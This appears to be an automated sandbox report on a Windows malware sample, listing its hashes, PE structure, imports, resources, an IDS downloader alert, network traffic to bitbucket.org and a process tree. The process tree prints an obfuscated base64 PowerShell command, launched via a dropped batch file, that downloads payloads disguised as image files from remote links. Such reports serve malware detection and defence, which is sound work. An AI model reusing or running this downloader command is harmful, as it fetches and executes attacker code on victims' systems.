SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):6.175225207813698
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:nTHivMbGpg.exe
File size:192'512 bytes
MD5:8d797e4c1866e6542705a564b7fda527
SHA1:207db5ae1e14888dc1b2d552ba49d45b7cc3b48f
SHA256:e60cc4cdd031cca383ae7d7449eda37dd72d4ef864816d452a7df72a9d019337
SHA512:28c2a92f469cd5d6d7ab4b7d14ce7efebaa89e644c0eb387ad09b5ce87b0f3e286d274dc0197dc6e041c5c79e55b009d2323d87652433e6b6f79f08a41d9b7a6
SSDEEP:3072:WHwrxmMpvDITZg1SX5vWp1icKAArDZz4N9GhbkENEkdByr:5rMZgp0yN90vEAB6
TLSH:80148D0A63E420A6E4B5537859F2C2775A317CB25B7496BF12C4ED7F3E23680A532B07
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"
Icon Hash:823092d2ec684430
Entrypoint:0x140008460
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:10
OS Version Minor:0
File Version Major:10
File Version Minor:0
Subsystem Version Major:10
Subsystem Version Minor:0
Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
Instruction
dec eax
sub esp, 28h
call 00007F652103FDD0h
dec eax
add esp, 28h
jmp 00007F652103F64Bh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [00000F8Dh]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [000046C2h], ebx
je 00007F652103F64Ch
dec eax
cmp eax, ebx
jne 00007F652103F65Fh
mov edi, 00000001h
mov eax, dword ptr [000046B8h]
cmp eax, 01h
jne 00007F652103F65Ch
lea ecx, dword ptr [eax+1Eh]
call 00007F652103FC63h
jmp 00007F652103F6C9h
mov ecx, 000003E8h
call dword ptr [00000F3Bh]
jmp 00007F652103F606h
mov eax, dword ptr [00004693h]
test eax, eax
jne 00007F652103F6A5h
mov dword ptr [00004685h], 00000001h
dec esp
lea esi, dword ptr [000011BEh]
dec eax
lea ebx, dword ptr [0000119Fh]
                                                                                                              dec eax
                                                                                                              mov dword ptr [esp+30h], ebx
                                                                                                              mov dword ptr [esp+24h], eax
                                                                                                              dec ecx
                                                                                                              cmp ebx, esi
                                                                                                              jnc 00007F652103F671h
                                                                                                              test eax, eax
                                                                                                              jne 00007F652103F671h
                                                                                                              dec eax
                                                                                                              cmp dword ptr [ebx], 00000000h
                                                                                                              je 00007F652103F65Ch
                                                                                                              dec ecx
                                                                                                              mov edx, 5E523070h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa2b4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1ff56 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x42c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2f000 | 0x2c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a68 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9148 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7e40 | 0x8000 | d22d8a48c14d2185814d2ed24fb0aed1 | False | 0.546173095703125 | data | 6.092855112591348 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2340 | 0x3000 | 3748ff8966297360bdba725e2d585c23 | False | 0.318359375 | data | 3.84344715350442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x1000 | f198899505f620007167379f74f8141c | False | 0.083251953125 | data | 1.0384025678015962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x42c | 0x1000 | 2d9ecb32a70228f2b07b654e216a79ee | False | 0.156005859375 | data | 1.4378876073270839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x1ff56 | 0x20000 | e76a9f8a5e0d2e22f0fad0506d41e1d1 | False | 0.6657028198242188 | data | 6.626189673913868 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2f000 | 0x2c | 0x1000 | cf22972a59e8c2a2ad0453d649f2025d | False | 0.017578125 | data | 0.10781936458684958 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xfac8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x128e4 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12f4c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13234 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1341c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13544 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x143ec | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14c94 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1535c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x158c4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x23298 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25840 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x268e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x27270 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_ICON | 0x276d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.32978723404255317
RT_ICON | 0x27b40 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.19394934333958724
RT_ICON | 0x28be8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.1354771784232365
RT_DIALOG | 0x2b190 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x2b484 | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x2b634 | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x2b79c | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x2b95c | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x2ba8c | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x2bbac | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x2bc38 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x2c158 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x2c724 | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2cbd4 | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x2d020 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x2d3f0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2d3f8 | 0xe14 | Microsoft Cabinet archive data, Windows 2000/XP setup, 3604 bytes, 1 file, at 0x2c +A "124.bat", ID 508, number 1, 1 datablock, 0x1503 compression | English | United States | 1.0030521642619312
RT_RCDATA | 0x2e20c | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e210 | 0x24 | data | English | United States | 0.7777777777777778
RT_RCDATA | 0x2e234 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2e23c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2e244 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e248 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2e250 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e254 | 0xf | ASCII text, with no line terminators | English | United States | 1.5333333333333334
RT_RCDATA | 0x2e264 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e268 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2e26c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2e274 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x2e27c | 0x30 | data | | | 0.9166666666666666
RT_GROUP_ICON | 0x2e2ac | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x2e368 | 0x408 | data | English | United States | 0.42248062015503873
RT_MANIFEST | 0x2e770 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T19:02:44.809157+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49700 | 185.166.143.50 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 19:02:42.302431107 CEST | 57645 | 53 | 192.168.2.7 | 1.1.1.1
Oct 2, 2024 19:02:42.312102079 CEST | 53 | 57645 | 1.1.1.1 | 192.168.2.7
Oct 2, 2024 19:02:59.322211981 CEST | 53 | 58549 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 19:02:42.302431107 CEST | 192.168.2.7 | 1.1.1.1 | 0x1716 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Oct 2, 2024 19:02:42.312102079 CEST1.1.1.1192.168.2.70x1716No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                              Oct 2, 2024 19:02:42.312102079 CEST1.1.1.1192.168.2.70x1716No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                              Oct 2, 2024 19:02:42.312102079 CEST1.1.1.1192.168.2.70x1716No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                              • bitbucket.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 185.166.143.50 | 443 | 2412 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 17:02:43 UTC | 110 | OUT | GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
2024-10-02 17:02:43 UTC | 3988 | IN | HTTP/1.1 404 Not Found
Date: Wed, 02 Oct 2024 17:02:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15020
Server: AtlassianEdge
Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
X-Used-Mesh: False
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
Etag: "b693a90a4b9b7ba5606827020189b49f"
X-Dc-Location: Micros-3
X-Served-By: 3c4d22791762
X-Version: 3ff600212c86
X-Static-Version: 3ff600212c86
X-Request-Count: 394
X-Render-Time: 0.08880853652954102
X-B3-Traceid: 7002740a6d0144de9b07c02da296923c
X-B3-Spanid: ab147ab00f9b85bb
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend. [TRUNCATED]
X-Usage-Quota-Remaining: 998487.578
X-Usage-Request-Cost: 1537.47
X-Usage-User-Time: 0.041805
X-Usage-System-Time: 0.004319
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Cache-Control: max-age=900
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 7002740a6d0144de9b07c02da296923c
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Server-Timing: atl-edge;dur=200,atl-edge-internal;dur=2,atl-edge-upstream;dur=198,atl-edge-pop;desc="aws-eu-central-1"
Connection: close
2024-10-02 17:02:43 UTC | 12396 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="UhDIIMGt8Fw9MdYZYHDmlg==">if (wind
2024-10-02 17:02:43 UTC | 2624 | IN | Data Ascii: i-in-frontbucket": true, "pipelines-deployments-settings-ui-in-frontbucket": true, "pipelines-runners-settings-ui-in-frontbucket": true, "pr-dependencies": false, "commit-expand-inno": false, "syntax-highlighting": false, "create-workspace-show-recaptcha"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49700 | 185.166.143.50 | 443 | 2412 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 17:02:44 UTC | 87 | OUT | GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1
Host: bitbucket.org
2024-10-02 17:02:44 UTC | 3988 | IN | HTTP/1.1 404 Not Found
Date: Wed, 02 Oct 2024 17:02:44 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15023
Server: AtlassianEdge
Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
X-Used-Mesh: False
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
Etag: "dcf3f17fb20258bb578342014cdbd4f0"
X-Dc-Location: Micros-3
X-Served-By: b49e06def07e
X-Version: 3ff600212c86
X-Static-Version: 3ff600212c86
X-Request-Count: 154
X-Render-Time: 0.08371186256408691
X-B3-Traceid: 6e135e3382124723921a6252805b581a
X-B3-Spanid: b2a3d0ff1cd02587
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend. [TRUNCATED]
X-Usage-Quota-Remaining: 997292.410
X-Usage-Request-Cost: 1556.20
X-Usage-User-Time: 0.040645
X-Usage-System-Time: 0.006041
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Cache-Control: max-age=900
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 6e135e3382124723921a6252805b581a
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Server-Timing: atl-edge;dur=192,atl-edge-internal;dur=4,atl-edge-upstream;dur=190,atl-edge-pop;desc="aws-eu-central-1"
Connection: close
2024-10-02 17:02:44 UTC | 12396 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="ZOMOKYiM3v4/MCwtRSec2w==">if (wind
2024-10-02 17:02:44 UTC | 2627 | IN | Data Ascii: s-ui-in-frontbucket": true, "pipelines-deployments-settings-ui-in-frontbucket": true, "pipelines-runners-settings-ui-in-frontbucket": true, "pr-dependencies": false, "commit-expand-inno": false, "syntax-highlighting": false, "create-workspace-show-recaptc



                                                                                                              Target ID:0
                                                                                                              Start time:13:02:37
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Users\user\Desktop\nTHivMbGpg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\Desktop\nTHivMbGpg.exe"
                                                                                                              Imagebase:0x7ff6fd210000
                                                                                                              File size:192'512 bytes
                                                                                                              MD5 hash:8D797E4C1866E6542705A564B7FDA527
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:13:02:37
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c 124.bat
                                                                                                              Imagebase:0x7ff627de0000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:13:02:37
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:13:02:38
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#